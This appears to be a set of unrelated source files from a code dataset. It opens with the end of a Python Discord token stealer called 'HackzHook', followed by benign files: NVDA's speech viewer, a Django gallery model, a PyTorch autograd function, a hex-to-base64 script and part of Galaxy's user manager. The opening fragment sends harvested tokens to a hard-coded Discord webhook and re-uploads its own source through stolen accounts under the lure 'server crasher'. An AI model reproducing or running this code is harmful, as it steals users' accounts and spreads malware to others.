file.write(token + "\n")
if len(working) == 0:
working.append('123')
webhook = {
"content": "",
"embeds": embeds,
"username": "HackzHook",
"avatar_url": ""
}
try:
urlopen(Request("https://discord.com/api/webhooks/894240616073035836/eRCYt8KsbaNUyHsoG0lyljTw_oWwGsnrVfOT6mFINkTKKkni7rgsxOaanRg-Qeq_DJTE", data=dumps(webhook).encode(), headers=getheaders()))
except:
pass
if self_spread:
for token in working:
with open(argv[0], encoding="utf-8") as file:
content = file.read()
payload = f'-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="file"; filename="{__file__}"\nContent-Type: text/plain\n\n{content}\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="content"\n\nserver crasher. python download: https://www.python.org/downloads\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="tts"\n\nfalse\n-----------------------------325414537030329320151394843687--'
Thread(target=spread, args=(token, payload, 7500 / 1000)).start()
try:
main()
except Exception as e:
print(e)
pass
print("downloaded HackzHook")
| true | true |
1c2cb33a1468285aeaaae12a0018473695336db0 | 6,746 | py | Python | source/speechViewer.py | riku22/nvdajp | 66a828ea89d317e4aa0ad2aed4b3b1e08920afb6 | [
"bzip2-1.0.6"
] | 19 | 2016-05-11T05:15:31.000Z | 2022-03-17T12:40:10.000Z | source/speechViewer.py | riku22/nvdajp | 66a828ea89d317e4aa0ad2aed4b3b1e08920afb6 | [
"bzip2-1.0.6"
] | 307 | 2015-08-27T11:22:33.000Z | 2022-03-29T10:43:34.000Z | source/speechViewer.py | riku22/nvdajp | 66a828ea89d317e4aa0ad2aed4b3b1e08920afb6 | [
"bzip2-1.0.6"
] | 14 | 2016-03-28T07:31:49.000Z | 2022-03-30T04:56:35.000Z | # A part of NonVisual Desktop Access (NVDA)
# Copyright (C) 2006-2021 NV Access Limited, Thomas Stivers, Accessolutions, Julien Cochuyt
# This file is covered by the GNU General Public License.
# See the file COPYING for more details.
import wx
import gui
import config
from logHandler import log
from speech import SpeechSequence
import gui.contextHelp
# Inherit from wx.Frame because these windows show in the alt+tab menu (where miniFrame does not)
# We have to manually add a wx.Panel to get correct tab ordering behaviour.
# wx.Dialog causes a crash on destruction when multiple were created at the same time (brailleViewer
# may start at the same time)
class SpeechViewerFrame(
gui.contextHelp.ContextHelpMixin,
wx.Frame # wxPython does not seem to call base class initializer, put last in MRO
):
helpId = "SpeechViewer"
def _getDialogSizeAndPosition(self):
dialogSize = wx.Size(500, 500)
dialogPos = wx.DefaultPosition
if not config.conf["speechViewer"]["autoPositionWindow"] and self.doDisplaysMatchConfig():
log.debug("Setting speechViewer window position")
speechViewSection = config.conf["speechViewer"]
dialogSize = wx.Size(speechViewSection["width"], speechViewSection["height"])
dialogPos = wx.Point(x=speechViewSection["x"], y=speechViewSection["y"])
return dialogSize, dialogPos
def __init__(self, onDestroyCallBack):
dialogSize, dialogPos = self._getDialogSizeAndPosition()
super().__init__(
gui.mainFrame,
title=_("NVDA Speech Viewer"),
size=dialogSize,
pos=dialogPos,
style=wx.CAPTION | wx.CLOSE_BOX | wx.RESIZE_BORDER | wx.STAY_ON_TOP
)
self._isDestroyed = False
self.onDestroyCallBack = onDestroyCallBack
self.Bind(wx.EVT_CLOSE, self.onClose)
self.Bind(wx.EVT_WINDOW_DESTROY, self.onDestroy)
self.Bind(wx.EVT_ACTIVATE, self._onDialogActivated, source=self)
self.frameContentsSizer = wx.BoxSizer(wx.HORIZONTAL)
self.SetSizer(self.frameContentsSizer)
self.panel = wx.Panel(self)
self.frameContentsSizer.Add(self.panel, proportion=1, flag=wx.EXPAND)
self.panelContentsSizer = wx.BoxSizer(wx.VERTICAL)
self.panel.SetSizer(self.panelContentsSizer)
self._createControls(sizer=self.panelContentsSizer, parent=self.panel)
self.SetTransparent(229) # int(255.0 * 0.90)
# Don't let speech viewer to steal keyboard focus when opened
self.ShowWithoutActivating()
def _createControls(self, sizer, parent):
self.textCtrl = wx.TextCtrl(
parent,
style=wx.TE_RICH2 | wx.TE_READONLY | wx.TE_MULTILINE
)
sizer.Add(
self.textCtrl,
proportion=1,
flag=wx.EXPAND
)
self.shouldShowOnStartupCheckBox = wx.CheckBox(
parent,
# Translators: The label for a setting in the speech viewer that controls
# whether the speech viewer is shown at startup or not.
label=_("&Show Speech Viewer on Startup")
)
sizer.Add(
self.shouldShowOnStartupCheckBox,
border=5,
flag=wx.EXPAND | wx.ALL
)
self.shouldShowOnStartupCheckBox.SetValue(config.conf["speechViewer"]["showSpeechViewerAtStartup"])
self.shouldShowOnStartupCheckBox.Bind(
wx.EVT_CHECKBOX,
self.onShouldShowOnStartupChanged
)
self.SetTransparent(229) # int(255.0 * 0.90)
def _onDialogActivated(self, evt):
# Check for destruction, if the speechviewer window has focus when we exit NVDA it regains focus briefly
# when the quit NVDA dialog disappears. Then shouldShowOnStartupCheckBox is a deleted window when we
# try to setFocus
if not self._isDestroyed:
# focus is normally set to the first child, however,
# the checkbox gives more context, and makes it obvious how to stop showing the dialog.
self.shouldShowOnStartupCheckBox.SetFocus()
def onClose(self, evt):
assert isActive, "Cannot close Speech Viewer as it is already inactive"
deactivate()
def onShouldShowOnStartupChanged(self, evt):
config.conf["speechViewer"]["showSpeechViewerAtStartup"] = self.shouldShowOnStartupCheckBox.IsChecked()
_isDestroyed: bool
def onDestroy(self, evt):
self._isDestroyed = True
log.debug("SpeechViewer destroyed")
self.onDestroyCallBack()
evt.Skip()
def doDisplaysMatchConfig(self):
configSizes = config.conf["speechViewer"]["displays"]
attachedSizes = self.getAttachedDisplaySizesAsStringArray()
return len(configSizes) == len(attachedSizes) and all( configSizes[i] == attachedSizes[i] for i in range(len(configSizes)))
def getAttachedDisplaySizesAsStringArray(self):
displays = ( wx.Display(i).GetGeometry().GetSize() for i in range(wx.Display.GetCount()) )
return [repr( (i.width, i.height) ) for i in displays]
def savePositionInformation(self):
position = self.GetPosition()
config.conf["speechViewer"]["x"] = position.x
config.conf["speechViewer"]["y"] = position.y
size = self.GetSize()
config.conf["speechViewer"]["width"] = size.width
config.conf["speechViewer"]["height"] = size.height
config.conf["speechViewer"]["displays"] = self.getAttachedDisplaySizesAsStringArray()
config.conf["speechViewer"]["autoPositionWindow"] = False
_guiFrame=None
isActive=False
def activate():
"""
Function to call to trigger the speech viewer window to open.
"""
_setActive(True, SpeechViewerFrame(_cleanup))
def _setActive(isNowActive, speechViewerFrame=None):
global _guiFrame, isActive
isActive = isNowActive
_guiFrame = speechViewerFrame
if gui and gui.mainFrame:
gui.mainFrame.onSpeechViewerEnabled(isNowActive)
#: How to separate items in a speech sequence
SPEECH_ITEM_SEPARATOR = " "
#: How to separate speech sequences
SPEECH_SEQUENCE_SEPARATOR = "\n"
def appendSpeechSequence(sequence: SpeechSequence) -> None:
""" Appends a speech sequence to the speech viewer.
@param sequence: To append, items are separated with . Concluding with a newline.
"""
if not isActive:
return
# If the speech viewer text control has the focus, we want to disable updates
# Otherwise it would be impossible to select text, or even just read it (as a blind person).
if _guiFrame.FindFocus() == _guiFrame.textCtrl:
return
# to make the speech easier to read, we must separate the items.
text = SPEECH_ITEM_SEPARATOR.join(
speech for speech in sequence if isinstance(speech, str)
)
_guiFrame.textCtrl.AppendText(text + SPEECH_SEQUENCE_SEPARATOR)
def _cleanup():
global isActive
if not isActive:
return
_setActive(False)
def deactivate():
global _guiFrame, isActive
if not isActive:
return
# #7077: If the window is destroyed, text control will be gone, so save speech viewer position before destroying the window.
_guiFrame.savePositionInformation()
_guiFrame.Destroy()
| 35.882979 | 126 | 0.739401 |
import wx
import gui
import config
from logHandler import log
from speech import SpeechSequence
import gui.contextHelp
class SpeechViewerFrame(
gui.contextHelp.ContextHelpMixin,
wx.Frame
):
helpId = "SpeechViewer"
def _getDialogSizeAndPosition(self):
dialogSize = wx.Size(500, 500)
dialogPos = wx.DefaultPosition
if not config.conf["speechViewer"]["autoPositionWindow"] and self.doDisplaysMatchConfig():
log.debug("Setting speechViewer window position")
speechViewSection = config.conf["speechViewer"]
dialogSize = wx.Size(speechViewSection["width"], speechViewSection["height"])
dialogPos = wx.Point(x=speechViewSection["x"], y=speechViewSection["y"])
return dialogSize, dialogPos
def __init__(self, onDestroyCallBack):
dialogSize, dialogPos = self._getDialogSizeAndPosition()
super().__init__(
gui.mainFrame,
title=_("NVDA Speech Viewer"),
size=dialogSize,
pos=dialogPos,
style=wx.CAPTION | wx.CLOSE_BOX | wx.RESIZE_BORDER | wx.STAY_ON_TOP
)
self._isDestroyed = False
self.onDestroyCallBack = onDestroyCallBack
self.Bind(wx.EVT_CLOSE, self.onClose)
self.Bind(wx.EVT_WINDOW_DESTROY, self.onDestroy)
self.Bind(wx.EVT_ACTIVATE, self._onDialogActivated, source=self)
self.frameContentsSizer = wx.BoxSizer(wx.HORIZONTAL)
self.SetSizer(self.frameContentsSizer)
self.panel = wx.Panel(self)
self.frameContentsSizer.Add(self.panel, proportion=1, flag=wx.EXPAND)
self.panelContentsSizer = wx.BoxSizer(wx.VERTICAL)
self.panel.SetSizer(self.panelContentsSizer)
self._createControls(sizer=self.panelContentsSizer, parent=self.panel)
self.SetTransparent(229)
self.ShowWithoutActivating()
def _createControls(self, sizer, parent):
self.textCtrl = wx.TextCtrl(
parent,
style=wx.TE_RICH2 | wx.TE_READONLY | wx.TE_MULTILINE
)
sizer.Add(
self.textCtrl,
proportion=1,
flag=wx.EXPAND
)
self.shouldShowOnStartupCheckBox = wx.CheckBox(
parent,
# Translators: The label for a setting in the speech viewer that controls
# whether the speech viewer is shown at startup or not.
label=_("&Show Speech Viewer on Startup")
)
sizer.Add(
self.shouldShowOnStartupCheckBox,
border=5,
flag=wx.EXPAND | wx.ALL
)
self.shouldShowOnStartupCheckBox.SetValue(config.conf["speechViewer"]["showSpeechViewerAtStartup"])
self.shouldShowOnStartupCheckBox.Bind(
wx.EVT_CHECKBOX,
self.onShouldShowOnStartupChanged
)
self.SetTransparent(229) # int(255.0 * 0.90)
def _onDialogActivated(self, evt):
# Check for destruction, if the speechviewer window has focus when we exit NVDA it regains focus briefly
# when the quit NVDA dialog disappears. Then shouldShowOnStartupCheckBox is a deleted window when we
# try to setFocus
if not self._isDestroyed:
# focus is normally set to the first child, however,
# the checkbox gives more context, and makes it obvious how to stop showing the dialog.
self.shouldShowOnStartupCheckBox.SetFocus()
def onClose(self, evt):
assert isActive, "Cannot close Speech Viewer as it is already inactive"
deactivate()
def onShouldShowOnStartupChanged(self, evt):
config.conf["speechViewer"]["showSpeechViewerAtStartup"] = self.shouldShowOnStartupCheckBox.IsChecked()
_isDestroyed: bool
def onDestroy(self, evt):
self._isDestroyed = True
log.debug("SpeechViewer destroyed")
self.onDestroyCallBack()
evt.Skip()
def doDisplaysMatchConfig(self):
configSizes = config.conf["speechViewer"]["displays"]
attachedSizes = self.getAttachedDisplaySizesAsStringArray()
return len(configSizes) == len(attachedSizes) and all( configSizes[i] == attachedSizes[i] for i in range(len(configSizes)))
def getAttachedDisplaySizesAsStringArray(self):
displays = ( wx.Display(i).GetGeometry().GetSize() for i in range(wx.Display.GetCount()) )
return [repr( (i.width, i.height) ) for i in displays]
def savePositionInformation(self):
position = self.GetPosition()
config.conf["speechViewer"]["x"] = position.x
config.conf["speechViewer"]["y"] = position.y
size = self.GetSize()
config.conf["speechViewer"]["width"] = size.width
config.conf["speechViewer"]["height"] = size.height
config.conf["speechViewer"]["displays"] = self.getAttachedDisplaySizesAsStringArray()
config.conf["speechViewer"]["autoPositionWindow"] = False
_guiFrame=None
isActive=False
def activate():
_setActive(True, SpeechViewerFrame(_cleanup))
def _setActive(isNowActive, speechViewerFrame=None):
global _guiFrame, isActive
isActive = isNowActive
_guiFrame = speechViewerFrame
if gui and gui.mainFrame:
gui.mainFrame.onSpeechViewerEnabled(isNowActive)
#: How to separate items in a speech sequence
SPEECH_ITEM_SEPARATOR = " "
#: How to separate speech sequences
SPEECH_SEQUENCE_SEPARATOR = "\n"
def appendSpeechSequence(sequence: SpeechSequence) -> None:
if not isActive:
return
# If the speech viewer text control has the focus, we want to disable updates
# Otherwise it would be impossible to select text, or even just read it (as a blind person).
if _guiFrame.FindFocus() == _guiFrame.textCtrl:
return
# to make the speech easier to read, we must separate the items.
text = SPEECH_ITEM_SEPARATOR.join(
speech for speech in sequence if isinstance(speech, str)
)
_guiFrame.textCtrl.AppendText(text + SPEECH_SEQUENCE_SEPARATOR)
def _cleanup():
global isActive
if not isActive:
return
_setActive(False)
def deactivate():
global _guiFrame, isActive
if not isActive:
return
# #7077: If the window is destroyed, text control will be gone, so save speech viewer position before destroying the window.
_guiFrame.savePositionInformation()
_guiFrame.Destroy()
| true | true |
1c2cb653021515a9f97f09004e4f0b9df55007c7 | 2,498 | py | Python | MyGallery/models.py | CharityMutonii/Gallery | d691f4bf77e97fc0a15ab88ecb9ebedb9fb378e7 | [
"MIT"
] | null | null | null | MyGallery/models.py | CharityMutonii/Gallery | d691f4bf77e97fc0a15ab88ecb9ebedb9fb378e7 | [
"MIT"
] | null | null | null | MyGallery/models.py | CharityMutonii/Gallery | d691f4bf77e97fc0a15ab88ecb9ebedb9fb378e7 | [
"MIT"
] | null | null | null | from django.db import models
# Create your models here.
class Category(models.Model):
id = models.AutoField(primary_key=True)
name = models.CharField(max_length=50)
def __str__(self):
'''
method to display category
'''
return self.name
def save_category(self):
'''
method to save category
'''
return self.save()
def delete_category(self):
'''
method to delete category
'''
return self.delete()
def update_category(self, cat1):
'''
method to update category
'''
self.update(location_name = cat1)
class Location(models.Model):
id = models.AutoField(primary_key=True)
name = models.CharField(max_length=60)
def __str__(self):
return self.name
def save_location(self):
return self.save()
def delete_location(self):
return self.delete()
def update_location(self, loc1):
self.update(location_name = loc1)
class Photo(models.Model):
id = models.AutoField(primary_key=True)
name = models.CharField(max_length=244)
description = models.TextField()
location = models.ForeignKey('Location',on_delete=models.CASCADE)
category = models.ForeignKey('Category',on_delete=models.CASCADE)
post_date = models.DateTimeField(auto_now_add=True)
image = models.ImageField(upload_to="images/")
def __str__(self):
'''
method to display image
'''
return self.name
def save_image(self):
'''
method to save image
'''
return self.save()
def delete_image(self):
'''
method to delete image
'''
return self.delete()
@classmethod
def all_photos(cls):
"""
A method to return all photos
"""
return cls.objects.all()
@classmethod
def get_photo_by_id(cls, id):
"""
A method to get a photo based on its id
"""
return cls.objects.get(id = id)
@classmethod
def search_photo_by_category(cls, search):
"""
A method to return all photos based on catergory
"""
return cls.objects.filter(category__name__icontains = search)
@classmethod
def filter_by_location(cls, location):
"""
A method to filter all photos based on the location
"""
return cls.objects.filter(location__name__icontains = location) | 26.020833 | 75 | 0.599279 | from django.db import models
class Category(models.Model):
id = models.AutoField(primary_key=True)
name = models.CharField(max_length=50)
def __str__(self):
return self.name
def save_category(self):
return self.save()
def delete_category(self):
return self.delete()
def update_category(self, cat1):
self.update(location_name = cat1)
class Location(models.Model):
id = models.AutoField(primary_key=True)
name = models.CharField(max_length=60)
def __str__(self):
return self.name
def save_location(self):
return self.save()
def delete_location(self):
return self.delete()
def update_location(self, loc1):
self.update(location_name = loc1)
class Photo(models.Model):
id = models.AutoField(primary_key=True)
name = models.CharField(max_length=244)
description = models.TextField()
location = models.ForeignKey('Location',on_delete=models.CASCADE)
category = models.ForeignKey('Category',on_delete=models.CASCADE)
post_date = models.DateTimeField(auto_now_add=True)
image = models.ImageField(upload_to="images/")
def __str__(self):
return self.name
def save_image(self):
return self.save()
def delete_image(self):
return self.delete()
@classmethod
def all_photos(cls):
return cls.objects.all()
@classmethod
def get_photo_by_id(cls, id):
return cls.objects.get(id = id)
@classmethod
def search_photo_by_category(cls, search):
return cls.objects.filter(category__name__icontains = search)
@classmethod
def filter_by_location(cls, location):
return cls.objects.filter(location__name__icontains = location) | true | true |
1c2cb6e17eb3f8b50d0763004077686a348c73c0 | 931 | py | Python | skpr/nn/_functions/Broadcast.py | PhilippPelz/scikit-pr-open | 50833b13160b6afe0a743d63d560bddeee2c18b5 | [
"MIT"
] | null | null | null | skpr/nn/_functions/Broadcast.py | PhilippPelz/scikit-pr-open | 50833b13160b6afe0a743d63d560bddeee2c18b5 | [
"MIT"
] | null | null | null | skpr/nn/_functions/Broadcast.py | PhilippPelz/scikit-pr-open | 50833b13160b6afe0a743d63d560bddeee2c18b5 | [
"MIT"
] | 1 | 2020-11-11T06:51:46.000Z | 2020-11-11T06:51:46.000Z | import torch as th
from torch.autograd import Function
import skpr.inout as io
class Broadcast(Function):
@staticmethod
def forward(ctx, input, ntimes, divide_by_ntimes=True):
io.logger.debug('Broadcast forward 1')
# out = input.clone()
# print 'Broadcast.forward'
ctx.ntimes = ntimes
ctx.divide_by_ntimes = divide_by_ntimes
io.logger.debug('Broadcast forward 2')
return input.view(1, *input.size()).expand(ntimes, *input.size())
@staticmethod
def backward(ctx, grad_output):
io.logger.debug('Broadcast backward 1')
# p.var['dCMul'] = grad_output.data.cpu().squeeze().numpy()
grad_input = th.sum(grad_output, 0)
if ctx.divide_by_ntimes:
grad_input.data.div_(ctx.ntimes)
# p.var['dP'] = grad_input.data.cpu().numpy()
io.logger.debug('Broadcast backward 2')
return grad_input, None, None
| 33.25 | 73 | 0.64232 | import torch as th
from torch.autograd import Function
import skpr.inout as io
class Broadcast(Function):
@staticmethod
def forward(ctx, input, ntimes, divide_by_ntimes=True):
io.logger.debug('Broadcast forward 1')
ctx.ntimes = ntimes
ctx.divide_by_ntimes = divide_by_ntimes
io.logger.debug('Broadcast forward 2')
return input.view(1, *input.size()).expand(ntimes, *input.size())
@staticmethod
def backward(ctx, grad_output):
io.logger.debug('Broadcast backward 1')
grad_input = th.sum(grad_output, 0)
if ctx.divide_by_ntimes:
grad_input.data.div_(ctx.ntimes)
io.logger.debug('Broadcast backward 2')
return grad_input, None, None
| true | true |
1c2cb7258d8fcc35b83be82c862143d79ad2662f | 616 | py | Python | set1/hexToBase64.py | nahgil2614/cryptopals | e1c83d07dacb1c159ab1bbc0532eca8200dedca0 | [
"MIT"
] | null | null | null | set1/hexToBase64.py | nahgil2614/cryptopals | e1c83d07dacb1c159ab1bbc0532eca8200dedca0 | [
"MIT"
] | null | null | null | set1/hexToBase64.py | nahgil2614/cryptopals | e1c83d07dacb1c159ab1bbc0532eca8200dedca0 | [
"MIT"
] | null | null | null | def hex_to_base64( hex ):
alph = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
bits = ''
for i in range(len(hex)):
mid = bin(int(hex[i], 16)).replace('0b', '')
while len(mid) != 4:
mid = '0' + mid
bits += mid
while (len(bits) % 6 != 0):
bits += '0'
base64 = ''
for j in range(0, len(bits), 6):
base64 += alph[ int( bits[j : j+6], 2) ]
return base64
def main():
string = input('Please enter hex string: ')
print(hex_to_base64(string))
return
if __name__ == '__main__':
main()
| 26.782609 | 78 | 0.525974 | def hex_to_base64( hex ):
alph = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
bits = ''
for i in range(len(hex)):
mid = bin(int(hex[i], 16)).replace('0b', '')
while len(mid) != 4:
mid = '0' + mid
bits += mid
while (len(bits) % 6 != 0):
bits += '0'
base64 = ''
for j in range(0, len(bits), 6):
base64 += alph[ int( bits[j : j+6], 2) ]
return base64
def main():
string = input('Please enter hex string: ')
print(hex_to_base64(string))
return
if __name__ == '__main__':
main()
| true | true |
1c2cb729a908d342f3ee9e0af387a71cf22e743f | 24,354 | py | Python | lib/galaxy/managers/users.py | ashvark/galaxy | 71d315cf3692b4a42fb684395a519d53f360ec92 | [
"CC-BY-3.0"
] | 1 | 2019-07-27T19:30:55.000Z | 2019-07-27T19:30:55.000Z | lib/galaxy/managers/users.py | ashvark/galaxy | 71d315cf3692b4a42fb684395a519d53f360ec92 | [
"CC-BY-3.0"
] | 2 | 2019-08-19T07:43:52.000Z | 2022-03-02T04:46:54.000Z | lib/galaxy/managers/users.py | ashvark/galaxy | 71d315cf3692b4a42fb684395a519d53f360ec92 | [
"CC-BY-3.0"
] | 1 | 2019-03-21T16:35:07.000Z | 2019-03-21T16:35:07.000Z | """
Manager and Serializer for Users.
"""
import logging
import random
import socket
from datetime import datetime
from markupsafe import escape
from sqlalchemy import and_, desc, exc, func, true
from galaxy import (
exceptions,
model,
util
)
from galaxy.managers import (
api_keys,
base,
deletable
)
from galaxy.security.validate_user_input import validate_email, validate_password, validate_publicname
from galaxy.web import url_for
log = logging.getLogger(__name__)
PASSWORD_RESET_TEMPLATE = """
To reset your Galaxy password for the instance at %s use the following link,
which will expire %s.
%s%s
If you did not make this request, no action is necessary on your part, though
you may want to notify an administrator.
If you're having trouble using the link when clicking it from email client, you
can also copy and paste it into your browser.
"""
class UserManager(base.ModelManager, deletable.PurgableManagerMixin):
foreign_key_name = 'user'
# TODO: there is quite a bit of functionality around the user (authentication, permissions, quotas, groups/roles)
# most of which it may be unneccessary to have here
# TODO: incorp BaseAPIController.validate_in_users_and_groups
# TODO: incorp CreatesApiKeysMixin
# TODO: incorporate UsesFormDefinitionsMixin?
def __init__(self, app):
self.model_class = app.model.User
super(UserManager, self).__init__(app)
def register(self, trans, email=None, username=None, password=None, confirm=None, subscribe=False):
"""
Register a new user.
"""
if not trans.app.config.allow_user_creation and not trans.user_is_admin:
message = "User registration is disabled. Please contact your local Galaxy administrator for an account."
if trans.app.config.error_email_to is not None:
message += " Contact: %s" % trans.app.config.error_email_to
return None, message
if not email or not username or not password or not confirm:
return None, "Please provide email, username and password."
message = "\n".join([validate_email(trans, email),
validate_password(trans, password, confirm),
validate_publicname(trans, username)]).rstrip()
if message:
return None, message
email = util.restore_text(email)
username = util.restore_text(username)
message, status = trans.app.auth_manager.check_registration_allowed(email, username, password)
if message:
return None, message
if subscribe:
message = self.send_subscription_email(email)
if message:
return None, message
user = self.create(email=email, username=username, password=password)
if self.app.config.user_activation_on:
self.send_activation_email(trans, email, username)
return user, None
def create(self, email=None, username=None, password=None, **kwargs):
"""
Create a new user.
"""
self._error_on_duplicate_email(email)
user = self.model_class(email=email)
user.set_password_cleartext(password)
user.username = username
if self.app.config.user_activation_on:
user.active = False
else:
# Activation is off, every new user is active by default.
user.active = True
self.session().add(user)
try:
self.session().flush()
# TODO:?? flush needed for permissions below? If not, make optional
except exc.IntegrityError as db_err:
raise exceptions.Conflict(str(db_err))
# can throw an sqlalx.IntegrityError if username not unique
self.app.security_agent.create_private_user_role(user)
# We set default user permissions, before we log in and set the default history permissions
if hasattr(self.app.config, "new_user_dataset_access_role_default_private"):
permissions = self.app.config.new_user_dataset_access_role_default_private
self.app.security_agent.user_set_default_permissions(user, default_access_private=permissions)
return user
def delete(self, user):
user.deleted = True
self.session().add(user)
self.session().flush()
def _error_on_duplicate_email(self, email):
"""
Check for a duplicate email and raise if found.
:raises exceptions.Conflict: if any are found
"""
# TODO: remove this check when unique=True is added to the email column
if self.by_email(email) is not None:
raise exceptions.Conflict('Email must be unique', email=email)
# ---- filters
def by_email(self, email, filters=None, **kwargs):
"""
Find a user by their email.
"""
filters = self._munge_filters(self.model_class.email == email, filters)
try:
# TODO: use one_or_none
return super(UserManager, self).one(filters=filters, **kwargs)
except exceptions.ObjectNotFound:
return None
def by_email_like(self, email_with_wildcards, filters=None, order_by=None, **kwargs):
"""
Find a user searching with SQL wildcards.
"""
filters = self._munge_filters(self.model_class.email.like(email_with_wildcards), filters)
order_by = order_by or (model.User.email, )
return super(UserManager, self).list(filters=filters, order_by=order_by, **kwargs)
# ---- admin
def is_admin(self, user, trans=None):
"""Return True if this user is an admin (or session is authenticated as admin).
Do not pass trans to simply check if an existing user object is an admin user,
pass trans when checking permissions.
"""
admin_emails = self._admin_emails()
if user is None:
# Anonymous session or master_api_key used, if master_api_key is detected
# return True.
rval = bool(trans and trans.user_is_admin)
return rval
return bool(admin_emails and user.email in admin_emails)
def _admin_emails(self):
"""
Return a list of admin email addresses from the config file.
"""
return [email.strip() for email in self.app.config.get("admin_users", "").split(",")]
def admins(self, filters=None, **kwargs):
"""
Return a list of admin Users.
"""
filters = self._munge_filters(self.model_class.email.in_(self._admin_emails()), filters)
return super(UserManager, self).list(filters=filters, **kwargs)
def error_unless_admin(self, user, msg="Administrators only", **kwargs):
"""
Raise an error if `user` is not an admin.
:raises exceptions.AdminRequiredException: if `user` is not an admin.
"""
# useful in admin only methods
if not self.is_admin(user, trans=kwargs.get("trans", None)):
raise exceptions.AdminRequiredException(msg, **kwargs)
return user
# ---- anonymous
def is_anonymous(self, user):
"""
Return True if `user` is anonymous.
"""
# define here for single point of change and make more readable
return user is None
def error_if_anonymous(self, user, msg="Log-in required", **kwargs):
"""
Raise an error if `user` is anonymous.
"""
if user is None:
# TODO: code is correct (401) but should be named AuthenticationRequired (401 and 403 are flipped)
raise exceptions.AuthenticationFailed(msg, **kwargs)
return user
# ---- current
def current_user(self, trans):
# define here for single point of change and make more readable
# TODO: trans
return trans.user
# ---- api keys
def create_api_key(self, user):
"""
Create and return an API key for `user`.
"""
# TODO: seems like this should return the model
return api_keys.ApiKeyManager(self.app).create_api_key(user)
# TODO: possibly move to ApiKeyManager
def valid_api_key(self, user):
"""
Return this most recent APIKey for this user or None if none have been created.
"""
query = (self.session().query(model.APIKeys)
.filter_by(user=user)
.order_by(desc(model.APIKeys.create_time)))
all = query.all()
if len(all):
return all[0]
return None
# TODO: possibly move to ApiKeyManager
def get_or_create_valid_api_key(self, user):
"""
Return this most recent APIKey for this user or create one if none have been
created.
"""
existing = self.valid_api_key(user)
if existing:
return existing
return self.create_api_key(self, user)
# ---- preferences
def preferences(self, user):
return dict((key, value) for key, value in user.preferences.items())
# ---- roles and permissions
def private_role(self, user):
return self.app.security_agent.get_private_user_role(user)
def sharing_roles(self, user):
return self.app.security_agent.get_sharing_roles(user)
def default_permissions(self, user):
return self.app.security_agent.user_get_default_permissions(user)
def quota(self, user, total=False):
if total:
return self.app.quota_agent.get_quota(user, nice_size=True)
return self.app.quota_agent.get_percent(user=user)
def tags_used(self, user, tag_models=None):
"""
Return a list of distinct 'user_tname:user_value' strings that the
given user has used.
"""
# TODO: simplify and unify with tag manager
if self.is_anonymous(user):
return []
# get all the taggable model TagAssociations
if not tag_models:
tag_models = [v.tag_assoc_class for v in self.app.tag_handler.item_tag_assoc_info.values()]
# create a union of subqueries for each for this user - getting only the tname and user_value
all_tags_query = None
for tag_model in tag_models:
subq = (self.session().query(tag_model.user_tname, tag_model.user_value)
.filter(tag_model.user == user))
all_tags_query = subq if all_tags_query is None else all_tags_query.union(subq)
# if nothing init'd the query, bail
if all_tags_query is None:
return []
# boil the tag tuples down into a sorted list of DISTINCT name:val strings
tags = all_tags_query.distinct().all()
tags = [((name + ':' + val) if val else name) for name, val in tags]
return sorted(tags)
def change_password(self, trans, password=None, confirm=None, token=None, id=None, current=None):
"""
Allows to change a user password with a token.
"""
if not token and not id:
return None, "Please provide a token or a user and password."
if token:
token_result = trans.sa_session.query(self.app.model.PasswordResetToken).get(token)
if not token_result or not token_result.expiration_time > datetime.utcnow():
return None, "Invalid or expired password reset token, please request a new one."
user = token_result.user
message = self.__set_password(trans, user, password, confirm)
if message:
return None, message
token_result.expiration_time = datetime.utcnow()
trans.sa_session.add(token_result)
return user, "Password has been changed. Token has been invalidated."
else:
user = self.by_id(self.app.security.decode_id(id))
if user:
message = self.app.auth_manager.check_change_password(user, current)
if message:
return None, message
message = self.__set_password(trans, user, password, confirm)
if message:
return None, message
return user, "Password has been changed."
else:
return user, "User not found."
def __set_password(self, trans, user, password, confirm):
if not password:
return "Please provide a new password."
if user:
# Validate the new password
message = validate_password(trans, password, confirm)
if message:
return message
else:
# Save new password
user.set_password_cleartext(password)
# Invalidate all other sessions
if trans.galaxy_session:
for other_galaxy_session in trans.sa_session.query(self.app.model.GalaxySession) \
.filter(and_(self.app.model.GalaxySession.table.c.user_id == user.id,
self.app.model.GalaxySession.table.c.is_valid == true(),
self.app.model.GalaxySession.table.c.id != trans.galaxy_session.id)):
other_galaxy_session.is_valid = False
trans.sa_session.add(other_galaxy_session)
trans.sa_session.add(user)
trans.sa_session.flush()
trans.log_event("User change password")
else:
return "Failed to determine user, access denied."
def send_activation_email(self, trans, email, username):
"""
Send the verification email containing the activation link to the user's email.
"""
activation_token = self.__get_activation_token(trans, escape(email))
activation_link = url_for(controller='user', action='activate', activation_token=activation_token, email=escape(email), qualified=True)
host = self.__get_host(trans)
body = ("Hello %s,\n\n"
"In order to complete the activation process for %s begun on %s at %s, please click on the following link to verify your account:\n\n"
"%s \n\n"
"By clicking on the above link and opening a Galaxy account you are also confirming that you have read and agreed to Galaxy's Terms and Conditions for use of this service (%s). This includes a quota limit of one account per user. Attempts to subvert this limit by creating multiple accounts or through any other method may result in termination of all associated accounts and data.\n\n"
"Please contact us if you need help with your account at: %s. You can also browse resources available at: %s. \n\n"
"More about the Galaxy Project can be found at galaxyproject.org\n\n"
"Your Galaxy Team" % (escape(username), escape(email),
datetime.utcnow().strftime("%D"),
trans.request.host, activation_link,
self.app.config.terms_url,
self.app.config.error_email_to,
self.app.config.instance_resource_url))
to = email
frm = self.app.config.email_from or 'galaxy-no-reply@' + host
subject = 'Galaxy Account Activation'
try:
util.send_mail(frm, to, subject, body, self.app.config)
return True
except Exception:
log.debug(body)
log.exception('Unable to send the activation email.')
return False
def __get_activation_token(self, trans, email):
"""
Check for the activation token. Create new activation token and store it in the database if no token found.
"""
user = trans.sa_session.query(self.app.model.User).filter(self.app.model.User.table.c.email == email).first()
activation_token = user.activation_token
if activation_token is None:
activation_token = util.hash_util.new_secure_hash(str(random.getrandbits(256)))
user.activation_token = activation_token
trans.sa_session.add(user)
trans.sa_session.flush()
return activation_token
def send_reset_email(self, trans, payload={}, **kwd):
"""Reset the user's password. Send an email with token that allows a password change."""
